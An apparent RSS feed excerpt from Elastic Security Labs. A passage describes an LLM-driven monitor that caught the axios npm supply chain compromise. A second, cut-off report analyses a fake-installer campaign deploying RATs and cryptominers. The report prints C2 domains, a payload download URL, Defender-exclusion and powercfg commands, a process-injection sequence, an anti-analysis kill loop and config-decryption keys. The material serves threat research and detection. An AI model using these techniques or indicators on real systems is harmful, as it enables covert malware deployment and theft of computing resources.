<li>Poll PyPI's changelog API and npm's CouchDB <code>_changes</code> feed for new releases</li>
<li>Filter against a watchlist of the top 15,000 packages by download count</li>
<li>Download the old and new versions directly from the registry (no pip install, no npm install, no code execution)</li>
<li>Diff them into a markdown report</li>
<li>Send the diff to an LLM: &quot;is this malicious?&quot;</li>
<li>If yes, alert to Slack</li>
</ol>
<p>I wanted to focus mainly on top packages since that's most likely where attackers would go anyway, and it would be much less costly in terms of tokens and compute. It was completely manageable to run on my laptop.</p>
<h2>Why Cursor</h2>
<p>There are a lot of agent harnesses out there. I've written my own for projects like AI malware reverse engineering. But I was very short on time, so I chose to harness up <a href="https://cursor.com/docs/cli/overview">Cursor</a> since it's one of my main dev tools. The Agent CLI lets you invoke it programmatically: pass a workspace, an instruction, and a model. I run it in <code>ask</code> mode (read-only) so it can only read the diff, never modify anything. The whole analysis step is a single subprocess call.</p>
<p>The prompt is simple. I tell it what to look for (obfuscated code, base64, exec/eval, unexpected network calls, steganography, persistence mechanisms, lifecycle script abuse) and ask it to respond with <code>Verdict: malicious</code> or <code>Verdict: benign</code>. Parse the verdict, act on it.</p>
<h2>On model selection</h2>
<p>I normally use Opus 4.6 or GPT 5.4 for most things. Opus especially for cybersecurity-focused tasks. But I wanted to keep costs down for something that needs to analyze dozens of releases per hour.</p>
<p>There have been some really good blog posts from the Cursor team lately, one on <a href="https://cursor.com/blog/fast-regex-search">fast regex search for agent tools</a> and another on their <a href="https://cursor.com/blog/real-time-rl-for-composer">real-time RL approach</a> where they use actual production inference tokens as training signals and deploy improved checkpoints roughly every five hours. Genuinely impressive engineering.</p>
<p>So I wanted to give Composer 2 a shot. I used fast mode, which is truly fast. Perfect for a real-time use case. Low cost, fast, and effective (in my testing).</p>
<h2>Testing on Telnyx</h2>
<p>You have to test these things to know they'll actually work. Usually that means tweaking prompts a bunch.</p>
<p>I got lucky (or unlucky) with timing. On the same Friday I was building this, the <a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">telnyx PyPI package got compromised</a> by TeamPCP. They injected 74 lines of malicious code into <code>_client.py</code>: payloads hidden inside WAV audio files (steganography), base64 obfuscation, a Windows persistence implant disguised as <code>msbuild.exe</code>, and exfiltration to a hardcoded C2.</p>
<p>I used the diff between the legitimate and malicious <code>telnyx</code> package to build out the initial prompt. The model was very good at identifying malicious changes like this. I also wanted to know immediately when a compromise was detected, so I added Slack alerting.</p>
<h2>Monday night</h2>
<p>I let it run over the weekend. It churned through releases, everything coming back benign.</p>
<p>I never got a single false positive, which is honestly strange if you've ever done detection work in cybersecurity. We're usually drowning in FPs. I intentionally instructed the LLM to only alert on &quot;high confidence&quot; supply chain compromises, as they are generally trigger-happy out of the box. Still catching the Telnyx test case, with no FPs. Could be overfitting with such a low sample size, but no time to build something more robust.</p>
<p>Then Monday night, working late, the Slack alert came in.</p>
<pre><code>🚨 Supply Chain Alert: axios 0.30.4
Verdict: MALICIOUS
npm: https://www.npmjs.com/package/axios/v/0.30.4
</code></pre>
<p>Did it really just find one of the biggest supply chain compromises in recent memory?</p>
<p>I checked the analysis. Rechecked it. Checked it again. The attackers had compromised a maintainer's npm account, changed the email to a ProtonMail account they controlled, and published two malicious versions (1.14.1 and 0.30.4). They didn't inject code directly into Axios. Instead they added a phantom dependency called <code>plain-crypto-js</code> that ran a postinstall hook deploying cross-platform malware. It was obviously malicious.</p>
<h2>The response</h2>
<p>I reached out immediately to our infosec team and research team at Elastic to get them spun up. I knew every second mattered. It turns out that when I contacted them, they had already received Elastic Defend alerts on a host that had installed the malicious package and were actively responding. But at that point nobody had realized the extent of the issue or had a root cause understanding of how the machine became infected. The monitoring tool provided that missing context.</p>
<p>I tried sending an email to <code>security@npmjs</code> and got a bounce back. Tried submitting to their security portal and got an error. I tweeted out in desperation to get a hold of a human. I also quickly opened a security issue on the axios repo itself.</p>
<p>Later, I saw a tweet from another researcher who had observed the compromise, and I realized I was handling this more as a vulnerability than a supply chain incident. With a vulnerability you coordinate quietly. With an active compromise that is installing malware on people's machines right now, going wide and open is the right call. So I immediately shared all the details I had compiled to X.</p>
<p>We even started getting alerts from our telemetry showing impacted orgs in the wild. The thing was actively running.</p>
<p>Fortunately, the Axios team jumped on it and pulled the packages pretty quickly. Also, the attacker's C2 server was getting so many requests that it was falling over. It could have been a lot worse.</p>
<p>Our team at Elastic Security Labs published full technical write-ups on the compromise. The first covers the end-to-end attack chain, the cross-platform malware, and the C2 protocol: <a href="https://www.elastic.co/kr/security-labs/axios-one-rat-to-rule-them-all">Inside the Axios supply chain compromise - one RAT to rule them all</a>. The second covers hunting and detection rules across Linux, Windows, and macOS: <a href="https://www.elastic.co/kr/security-labs/axios-supply-chain-compromise-detections">Elastic releases detections for the Axios supply chain compromise</a>.</p>
<h2>Where we go from here</h2>
<p>The state of things right now is not great and we need to do better as a whole software ecosystem, let alone the security industry.</p>
<p>In two weeks in March:</p>
<ul>
<li>Trivy (a security scanner) was compromised to steal CI/CD secrets</li>
<li>LiteLLM was compromised using those stolen secrets</li>
<li>Telnyx was compromised in the same campaign</li>
<li>Axios, one of the most depended-upon packages in npm, was compromised by a suspected DPRK actor</li>
<li>and more</li>
</ul>
<p>Package registries are critical infrastructure. The teams running PyPI and npm are doing great work, but the threat has moved past what current trust models can handle. We need better automated monitoring of package changes. Not just signature scanning but actually understanding what code does. LLMs are genuinely good at this, as this project shows. And we need credential rotation after breaches to happen faster. The Trivy to Litellm to Telnyx cascade happened because stolen creds weren't rotated quickly enough.</p>
<p>One practical thing you can do right now: don't pull in package updates immediately. Add a soak time. Let new versions sit for a period before your builds pick them up. We do this with our CI/CD systems at Elastic in <a href="https://www.elastic.co/kr/blog/shai-hulud-worm-2-0-updated-response">response</a> to shai-hulud. It won't stop everything, but it gives the community time to catch compromises before they hit your CI/CD pipelines and developer machines. The good news is the many package managers have added native support for this. For example, to enforce a 7-day delay:</p>
<pre><code>npm config set min-release-age 7
pnpm config set minimum-release-age 10080
yarn config set npmMinimumReleaseAge 10080
uv --exclude-newer &quot;7 days ago&quot;
</code></pre>
<h2>We're open sourcing this</h2>
<p>We're releasing the tool: <a href="https://github.com/elastic/supply-chain-monitor"><strong>supply-chain-monitor</strong></a></p>
<p>I want to be upfront. It's a proof of concept. I built it in an afternoon on no sleep. I don't expect anyone to run it at a production level. It requires a Cursor subscription for the LLM analysis, it processes releases sequentially, and the watchlists are static.</p>
<p>But the approach works. Diffing package releases in real-time and using AI to classify the changes caught a supply chain attack on one of the most popular packages in npm.</p>
<p>I'm sharing this because it's best for the community to learn from our experiences. If someone takes this idea and builds something better, great. If a package registry team builds it into their pipeline, even better. If it means someone else has a big save next time, this was worth it.</p>
<h2>How it works (for the curious)</h2>
<p><strong>Monitoring:</strong> Two threads poll PyPI (via <code>changelog_since_serial()</code> XML-RPC) and npm (via CouchDB <code>_changes</code> feed). New releases matching the top-N watchlist get queued. State persists to <code>last_serial.yaml</code> so it picks up where it left off.</p>
<p><strong>Diffing:</strong> Old and new versions downloaded directly from registry APIs. No pip/npm install, no code execution. Archives extracted, files hashed, unified diff report generated in markdown.</p>
<p><strong>Analysis:</strong> Diff report goes to Cursor Agent CLI in read-only mode. Prompt asks it to look for supply chain indicators. Output parsed for the verdict.</p>
<p><strong>Alerting:</strong> Malicious verdict fires a Slack message with the package name, rank, registry link, and analysis summary.</p>
<h2>AI in security, beyond this project</h2>
<p>Supply chain security is a big issue, but we aren’t powerless. AI gives us new tools to defend at scale at machine speed. This project is one example of using AI to help with a security problem, but we've been doing a lot of interesting work with AI across Elastic Security more broadly. One thing I'd highlight: our team recently published a post on <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">using Attack Discovery, Workflows, and Agent Builder to automatically detect and confirm APT-level attacks</a>. This shows the power of the Elastic Platform, delivering agentic security to meaningfully improve the efficiency and efficacy of your SOC in a time when we are collectively drowning in attacks.</p>
<hr />
<p><em>The supply-chain-monitor project is available at <a href="https://github.com/elastic/supply-chain-monitor">github.com/elastic/supply-chain-monitor</a>.</em></p>
<p><em>Thanks to the Elastic Infosec team for the rapid incident response, the axios maintainers for the quick takedown, and the security community for the collective effort that limited the blast radius.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/how-we-caught-the-axios-supply-chain-attack/how-we-caught-the-axios-supply-chain-attack.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Fake Installers to Monero: A Multi-Tool Mining Operation]]></title>
            <link>https://www.elastic.co/kr/security-labs/fake-installers-to-monero</link>
            <guid>fake-installers-to-monero</guid>
            <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs dissects a long-running operation deploying RATs, cryptominers, and CPA fraud through fake installer lures, tracking its evolution across campaigns and Monero payouts.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs has been tracking a financially motivated operation, designated REF1695, that has been active since at least late 2023. The operator deploys a combination of RATs, cryptominers, and custom XMRig loaders through fake installer packages. Across all observed campaigns, the infection chains share a consistent packing technique, overlapping C2 infrastructure, and common social engineering patterns, linking them to a single operator.</p>
<p>Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration. In this report, we trace the operation's evolution across multiple campaign builds, analyze the C2 communication protocols, document a previously unreported .NET implant (CNB Bot), and track the operator's financial returns via public Monero mining pool dashboards.</p>
<h3>Key takeaways</h3>
<ul>
<li>Financially motivated campaigns have been active since late 2023, deploying various RATs and cryptominers through fake installer packages.</li>
<li>Operator monetizes infections through both cryptomining and CPABuild fraud.</li>
<li>Stages use a consistent Themida/WinLicense + .NET Reactor packing combination</li>
<li>CNB Bot is a previously undocumented .NET implant with RSA-2048 signed task authentication</li>
<li>A custom XMRig loader evades detection by killing the miner whenever analysis tools are running and deploys WinRing0x64.sys</li>
<li>Over 27.88 XMR paid out across four tracked wallets, with active workers at the time of writing</li>
<li>We leveraged a Claude-driven agentic pipeline to automate the extraction of payload stages and implant configurations</li>
</ul>
<h2>Campaign 1 (CNB Bot)</h2>
<p>The most recent campaign involves dropping CNB Bot, using an ISO file as the infection vector. The ISO image contains 2 files: a single-stage .NET Reactor-protected loader further packed with Themida/WinLicense 3.x, and a ReadMe.txt. Associated ISO samples:</p>
<ul>
<li><code>460203070b5a928390b126fcd52c15ed3a668b77536faa6f0a0282cf1c157162</code></li>
<li><code>b8b7aecce2a4d00f209b1e4d30128ba6ef0f83bbdc05127f6f8ba97e7d6df291</code></li>
<li><code>9977b9185472c7d4be22c20f93bc401dd74bb47223957015a3261994d54c59fc</code></li>
<li><code>9fa23382820b1e781f3e05e9452176a72529395643f09080777fab7b9c6b1f5c</code></li>
<li><code>27db41f654b53e41a4e1621a83f2478fa46b1bbffc1923e5070440a7d410b8d3</code></li>
</ul>
<p>The ReadMe.txt serves as a social engineering lure, framing the unsigned binary as the product of a small non-profit team that cannot afford EV code-signing, then provides explicit instructions to bypass SmartScreen via <code>&quot;More Info&quot; → &quot;Run Anyway.&quot;</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image4.png" alt="ReadMe.txt lure" title="ReadMe.txt lure" /></p>
<p>Using the open-source Themida/Winlicense unpacker project, <a href="https://github.com/ergrelet/unlicense">Unlicense</a>, we automatically extracted the .NET Reactor-protected loader and then passed it through <a href="https://github.com/SychicBoy/NETReactorSlayer">NETReactorSlayer</a> for deobfuscation. The majority of campaigns were observed to use this combination of protection in both the initial and subsequent stages.</p>
<p>The loader first invokes PowerShell with <code>-WindowStyle Hidden</code>, to register broad Microsoft Defender exclusions via <code>Add-MpPreference -ExclusionPath</code> and <code>Add-MpPreference -ExclusionProcess</code>, covering the loader itself, staging directories (<code>%TEMP%</code>, <code>%LocalAppData%</code>, <code>%AppData%</code>) and a set of LOLBin process names the malware later utilizes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image10.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>It then extracts an embedded .NET assembly resource and writes it to disk at <code>%TEMP%\MLPCInstallHelper.exe</code> (filename varies by build), then executes it via PowerShell. This embedded resource is a .NET Reactor-protected CNB Bot instance, discussed in detail in the <strong>Code Analysis - CNB Bot</strong> section below.</p>
<p>Since no legitimate software is installed at any point, the loader presents a fake error dialog to the user, attributing the installation failure to unmet system requirements.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image13.png" alt="Fake error dialog" title="Fake error dialog" /></p>
<h2>Campaign 2 (PureRAT)</h2>
<p>Pivoting on the ReadMe.txt lure content, we discovered a campaign dropping PureRAT v3.0.1. This campaign uses a very similar initial-stage loader as campaign 1 and introduces a second-stage loader.</p>
<p>Example ISO samples employing this chain:</p>
<ul>
<li><code>7bb0e91558244bcc79b6d7a4fe9d9882f11d3a99b70e1527aac979e27165f1d7</code></li>
<li><code>c6c4a9725653b585a9d65fc90698d4610579b289bcfb2539f7a5f7e64e69f2e4</code></li>
<li><code>a3f84aa1d15fd33506157c61368fd602d0b81f69aff6c69249bf833d217308bb</code></li>
<li><code>82c03866670b70047209c39153615512f7253f125a252fe3dcd828c6598fdf86</code></li>
<li><code>542d2267b40c160b693646bc852df34cc508281c4f6ed2693b98147dae293678</code></li>
</ul>
<p>We will be using the first sample from this list as an example for our analysis.</p>
<p>The initial-stage loader applies Microsoft Defender exclusions to the same directory set (<code>%TEMP%</code>, loader path, <code>%LocalAppData%</code>, …), but process exclusions are limited to the loader executable only. The Stage 2 payload is extracted from the embedded resource to <code>%TEMP%\&lt;...&gt;InstallHelper.exe</code> and launched via hidden PowerShell <code>Start-Process</code>. Stage 2 is protected with the same Themida + .NET Reactor packing technique.</p>
<p>Stage 2 registers only process-level Microsoft Defender exclusions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image22.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>The loader then extracts four embedded resources into the install directory at <code>%SystemDrive%\Users\%UserName%\AppData\Local\SVCData\Config</code>, dropping 3 unused, benign DLLs and a malicious <code>svchost.exe</code> binary, which is the 3rd stage. Stage 3 is launched through PowerShell, and a scheduled task named <code>SVCConfig</code> is registered via <code>schtasks.exe</code> with an <code>ONLOGON</code> trigger and <code>HIGHEST</code> privilege.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image33.png" alt="Stage 3 installation" title="Stage 3 installation" /></p>
<p>Following payload launch, Stage 2 writes a temporary .bat file to <code>%TEMP%</code> with a polling loop that forcefully deletes the installer binary until successful, then deletes the batch file itself.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image38.png" alt="Self-delete installer binary" title="Self-delete installer binary" /></p>
<p>Stage 3 is a Themida + .NET Reactor-protected, in-memory PE loader, which is also the beginning of the PureRAT component. The encrypted next-stage module is stored as a .NET resource and decrypted via Triple DES (3DES) in CBC mode using an embedded key and IV. The decrypted output is a GZip-compressed PE: the first 4 bytes encode the decompressed size as a little-endian integer, followed by the GZip stream.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image3.png" alt="PureRAT next-stage decryption" title="PureRAT next-stage decryption" /></p>
<p>The PureRAT v3.0.1 configuration is decoded by base64-decoding an embedded string and deserializing the result as a Protobuf message:</p>
<ul>
<li><code>23-01-26</code> (build / campaign date)</li>
<li><code>windirautoupdates[.]top</code> (C2 #1)</li>
<li><code>winautordr.itemdb[.]com</code> (C2 #2)</li>
<li><code>winautordr.ydns[.]eu</code> (C2 #3)</li>
<li><code>winautordr.kozow[.]com</code>  (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image17.png" alt="PureRAT decoded configuration" title="PureRAT decoded configuration" /></p>
<p>The C2 communication protocol uses key derivation function - <code>PBKDF2-SHA1(&quot;Aesthetics135&quot;, embedded_salt=010217EA2530863FF804, iter=5000)</code> to derive 96 bytes, split into an AES-256-CBC key and an HMAC-SHA256 key. Incoming messages are authenticated by verifying the HMAC over <code>[IV | ciphertext]</code> stored in the first 32 bytes; the IV is then read from byte offset (32- 48) and used to decrypt the remaining ciphertext, yielding a <a href="https://protobuf.dev/">Protobuf</a>-encoded command message.</p>
<p>By decrypting traffic captured in VirusTotal sandboxes, we observed that the C2 server at <code>windirautoupdates[.]top</code> was automatically issuing a download-and-execute task directing the implant to fetch an XMR mining payload from <code>https://github[.]com/lebnabar198/Hgh5gM99fe3dG/raw/refs/heads/main/MnrsInstllr_240126[.]exe</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image24.png" alt="PureRAT initial task decryption" title="PureRAT initial task decryption" /></p>
<h2>Campaign 3 (PureRAT, PureMiner, XMRig loader)</h2>
<p>The third campaign variant shares the same initial-stage loader design as Campaigns 1 and 2. Its Stage 2 resembles Campaign 2 but differs by dropping multiple embedded payloads from the resource section, including PureRAT, a custom XMRig loader, and PureMiner.</p>
<p>Example ISO sample:</p>
<ul>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code>.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image40.png" alt="Installation of PureRAT, PureMiner, and a custom XMRig loader" title="Installation of PureRAT, PureMiner, and a custom XMRig loader" /></p>
<p>To keep the machine awake and maximize mining uptime, the loader disables sleep and hibernation via Windows power management commands:</p>
<ul>
<li><code>powercfg /change standby-timeout-ac 0</code></li>
<li><code>powercfg /change standby-timeout-dc 0</code></li>
<li><code>powercfg /change hibernate-timeout-ac 0</code></li>
<li><code>powercfg /change hibernate-timeout-dc 0</code></li>
</ul>
<p>The PureRAT configuration matches Campaign 2, differing only in the build/campaign ID: <code>25-11-25</code>.</p>
<p>The PE loader component of PureMiner is similar to PureRAT, and the decrypted module is also obfuscated via .NET Reactor. Since the configuration is Protobuf-serialized, hooking <code>ProtoBuf.Serializer::Deserialize</code> allows inspection of the configuration data:</p>
<ul>
<li><code>25-11-25</code> (build / campaign date)</li>
<li><code>wndlogon.hopto[.]org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb[.]com</code> (C2 #2)</li>
<li><code>wndlogon.ydns[.]eu</code> (C2 #3)</li>
<li><code>wndlogon.kozow[.]com</code> (C2 #4)</li>
<li><code>4c271ad41ea2f6a44ce8d0</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image41.png" alt="PureMiner decoded configuration" title="PureMiner decoded configuration" /></p>
<p>Additional behavioral indicators include the dynamic loading of AMD Display Library binaries (<code>atiadlxx.dll</code>/<code>atiadlxy.dll</code>) and the NVIDIA API library (<code>nvapi64.dll</code>), consistent with GPU hardware profiling techniques employed by PureMiner.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image1.png" alt="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" title="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" /></p>
<h3>Custom .NET-Based Loader for XMRig</h3>
<p>The following findings cover the custom XMRig loader deployed during this campaign. Analyzed samples:</p>
<ul>
<li><code>0176ffaf278b9281aa207c59b858c8c0b6e38fdb13141f7ed391c9f8b2dc7630</code></li>
<li><code>9409f9c398645ddac096e3331d2782705b62e388a8ecb1c4e9d527616f0c6a9e</code></li>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code></li>
</ul>
<h4>The Entry Point and Setup</h4>
<p>Execution begins in the <code>Start()</code> method. The loader first calls <code>FetchRemoteConfig()</code>, which reaches out to a hardcoded URL (<code>https://autoupdatewinsystem[.]top/MyMNRconfigs/0226.txt</code>). The response is AES-encrypted JSON, which the loader decrypts using a hardcoded key (<code>AsyncPrivateInputx64</code>) and parses to extract the pool, wallet, and mining arguments. If the remote server is unreachable or decryption fails, it falls back to a hardcoded <code>ztbpVbABSx1jDIKnWGbx1d_0</code> configuration to ensure mining can still occur.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image26.png" alt="The hard-coded configuration when the online config is unavailable" title="The hard-coded configuration when the online config is unavailable" /></p>
<h4>Resource Extraction</h4>
<p>Simultaneously, an asynchronous task triggers <code>ExtractResources()</code>. The loader checks the <code>%TEMP%</code> directory for two files: <code>procsrv.exe</code> (the renamed XMRig payload) and <code>WinRing0x64.sys</code> (a driver used by XMRig for direct hardware access). If either is absent, the loader unpacks them from its own assembly manifest.</p>
<h4>Evasion Loop</h4>
<p>After a 3-second sleep, the loader calls <code>StartEvasionTimer()</code>, initializing a timer that ticks every 1,000 milliseconds. On each tick, <code>IsAnalysisToolRunning()</code> compares all running process names against a hardcoded list of 35 security and monitoring tools (<code>Taskmgr</code>, <code>ProcessHacker</code>, <code>Wireshark</code>, <code>Procmon</code>, etc.).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image34.png" alt="Monitoring tools that are targeted" title="Monitoring tools that are targeted" /></p>
<p>If any analysis tool is detected, the loader immediately calls <code>KillMinerProcess()</code>, terminating <code>procsrv.exe</code>, effectively dropping the CPU usage back to normal.</p>
<p>If no analysis tool is detected, the loader calls <code>CheckAndRunMiner()</code>. If the miner is not currently running, it reconstructs the command-line arguments (using the remote or fallback config) and quietly launches the miner as a hidden background process via <code>LaunchMiner()</code>.</p>
<p>This creates a &quot;hide and seek&quot; scenario for the victim. Whenever they try to investigate why their PC is slow, the malware shuts down the miner.</p>
<h4>WinRing0x64.sys and Ring 0 Access</h4>
<p>The loader also drops and loads <code>WinRing0x64.sys</code>, a legitimate open-source driver frequently abused by cryptominers. The driver provides direct Ring 0 (kernel-level) hardware access, which XMRig uses to apply its Model Specific Register (MSR) modification, reconfiguring CPU prefetcher and L3 cache behavior to significantly boost RandomX (Monero) hash rates.</p>
<h2>Campaign 4 - Umnr_ (SilentCryptoMiner)</h2>
<p>From the <code>autoupdatewinsystem[.]top</code> domain, we identified another GitHub account <code>https://github[.]com/ugurlutaha6116</code> hosting another loader variant whose executable name is prefixed with <code>Umnr_</code>. This loader is a Themida-packed SilentCryptoMiner loader that installs persistently on the victim machine, injects a watchdog payload into <code>conhost.exe</code>, and a miner payload into <code>explorer.exe</code>, mining ETH or XMR depending on the build configuration.</p>
<p>SilentCryptoMiner is a closed-source Win32 64-bit malware released for free on <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner">GitHub</a>. The samples we analyzed are older versions than the latest <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner/releases">release</a>:</p>
<ul>
<li><code>1f7441d72eff2e9403be1d9ce0bb07792793b2cb963f2601ecfdf8c91cd9af73</code></li>
<li><code>468441d32f62520020d57ff1f24bb08af1bc10e9b4d4da1b937450f44e80a9be</code></li>
<li><code>4e6b8fdd819293ca3fe8f8add6937bf6531a936955d9ac974a6b231823c7330e</code></li>
<li><code>6492e50e79b979254314988228a513d5acbdaa950346414955dc052ae77d2988</code></li>
<li><code>ce90cb3a9bfb8a276cb50462be932e063ed408af8c5591dd2c50f1c6d18c394c</code></li>
</ul>
<h4>Direct Syscalls</h4>
<p>To evade detection, SilentCryptoMiner uses direct syscalls instead of <code>NTDLL</code> functions. To do this, it parses <code>NTDLL</code> exports to locate the target function by a hash of its name, extracts the syscall number, and manually executes the syscall instruction sequence.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image36.png" alt="Direct syscall procedure" title="Direct syscall procedure" /></p>
<h4>Disable Sleep and Hibernate</h4>
<p>To ensure it can use the host machine for as long as possible, SilentCryptoMiner disables Windows sleep and hibernation by executing a shell command.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image5.png" alt="Disable windows sleep and hibernate" title="Disable windows sleep and hibernate" /></p>
<h4>Install Persistence</h4>
<p>After copying itself to its installation folder (in this case, configured to masquerade as legitimate software named “<code>Appdata/Local/OptimizeMS/optims.exe</code>”), SilentCryptoMiner proceeds to establish persistence. If the process is running with administrator privileges, it creates a scheduled task configured via an XML file.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image8.png" alt="Schtask task creation for persistence" title="Schtask task creation for persistence" /></p>
<p>The XML file is dropped onto the disk in the <code>AppData/Local/Temp</code> folder and contains the task configuration. One interesting setting is <code>AllowHardTerminate = False</code>, which prevents the task from being forcibly terminated via <code>schtasks</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image14.png" alt="Malware XML task configuration" title="Malware XML task configuration" /></p>
<p>If the process lacks administrator rights, it instead adds a <strong>Run</strong> key to the registry.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image35.png" alt="Malware adds a run key for persistence if not running as administrator" title="Malware adds a run key for persistence if not running as administrator" /></p>
<p>After initial installation, the process terminates. On subsequent execution by the persistence mechanism, it verifies that it is running from its installation directory before proceeding to the process injection phase.</p>
<h4>Inject watchdog and miner payloads</h4>
<p>In the samples we analyzed, the builds contain four payloads:</p>
<ul>
<li>A <code>Winring0.sys</code> driver</li>
<li>A watchdog process</li>
<li>A Monero miner</li>
<li>An Ethereum miner</li>
</ul>
<p>We know that the malware can contain multiple miners; however, in our tests, we only observed the Monero miner injected into a process. In the code, only one of the two miners is injected, which we assume depends on the configuration.</p>
<p>SilentCryptoMiner initiates injection by creating a new suspended process with a spoofed parent process. It obtains a handle to <code>explorer.exe</code> using <code>NtQuerySystemInformation</code> and <code>NtOpenProcess</code>, then configures a <code>PS_ATTRIBUTE_LIST</code> structure with the handle for parent spoofing and passes it to <code>NtCreateUserProcess</code>.</p>
<p>The payload is written to disk via <code>NtCreateFile</code> and <code>NtWriteFile</code>, then mapped into the target process's memory space through <code>NtCreateSection</code> and <code>NtMapViewOfSection</code>. Execution flow is hijacked by modifying the suspended process's entry point (in the <code>RCX</code> register) to point to the payload's image base using <code>NtGetContextThread</code> and <code>NtSetContextThread</code>. The process's PEB (in <code>RDX</code> register) image base is also set to the payload's address using <code>NtWriteVirtualMemory</code>. Finally, the process is resumed with <code>NtResumeThread</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image21.png" alt="Process injection procedure" title="Process injection procedure" /></p>
<p>The payload data is decrypted from a hardcoded blob in the binary using a simple XOR cipher with a hardcoded key. After injection, the blob is re-encrypted in memory to reduce forensic traces.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image15.png" alt="Decrypts, injects, and re-encrypts payload" title="Decrypts, injects, and re-encrypts payload" /></p>
<p>In the analyzed samples, SilentCryptoMiner utilizes two distinct processes for payload injection: the watchdog component is injected into <code>conhost.exe</code>, while the miner payload targets <code>explorer.exe</code>. The <code>WinRing0.sys</code> driver is also written to disk, then loaded and used by the miner. This is likely to optimize the CPU for mining operations.</p>
<h4>Watchdog and Miner Processes</h4>
<p>The watchdog is responsible for monitoring the loader file in its persistence folder: it rewrites the file to disk if it is deleted and reinstalls the persistence mechanism if the scheduled task or registry key is deleted.</p>
<p>The miner downloads its configuration from <code>(/UWP1)?/*CPU.txt</code> endpoints and communicates with its C2 via <code>[UWP1|UnamWebPanel7]/api/endpoint.php</code> API, depending on the version.</p>
<p>Based on the documentation and memory strings, we know that the miner includes supplementary protection measures: Like the .NET miner detailed previously, it halts mining operations when it detects specific blocklisted processes. These processes encompass a variety of tools, including those used for process monitoring, network monitoring, antivirus protection, and reverse engineering.</p>
<h2>Code analysis - CNB Bot</h2>
<p>CNB Bot is a .NET implant with integrated loader capabilities. It implements a command-polling loop against its configured C2 servers, and supports 3 operator commands:</p>
<ul>
<li>download-and-execute arbitrary payloads</li>
<li>self-update</li>
<li>uninstall/cleanup</li>
</ul>
<p>On Jan 31, 2026, malware researcher <a href="https://x.com/ViriBack/status/2017388775978967074">@ViriBack</a> discovered a related C2 panel that was exposed at <code>https://win64autoupdates[.]top/CNB/l0g1n234[.]php</code>, which has since been taken offline.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image16.png" alt="CNB Bot leaked panel" title="CNB Bot leaked panel" /></p>
<h3>Configuration</h3>
<p>Some configuration values for CNB Bot are not encrypted, such as the bot version (<code>1.1.6.</code>), campaign date (<code>03_26</code>), and the scheduled task name for persistence (<code>HostDataPlugin</code>).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image11.png" alt="Bot version and campaign ID in plaintext" title="Bot version and campaign ID in plaintext" /></p>
<p>Sensitive strings (C2 URLs, mutex name, auth token, comms key) are stored AES-256-CBC encrypted with a hardcoded 32-byte key, which differs across campaign batches.</p>
<p>Strings can be decrypted through the following formula:</p>
<pre><code>x = base64.decode(data)
decrypted = AES256CBC(key=hard_coded_key, iv=x[0:16]).decrypt(x[16:])
</code></pre>
<p>Extracted configuration:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Mutex Name</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
<tr>
<td align="left">C2 URL</td>
<td align="left"><code>https://tabbysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #1</td>
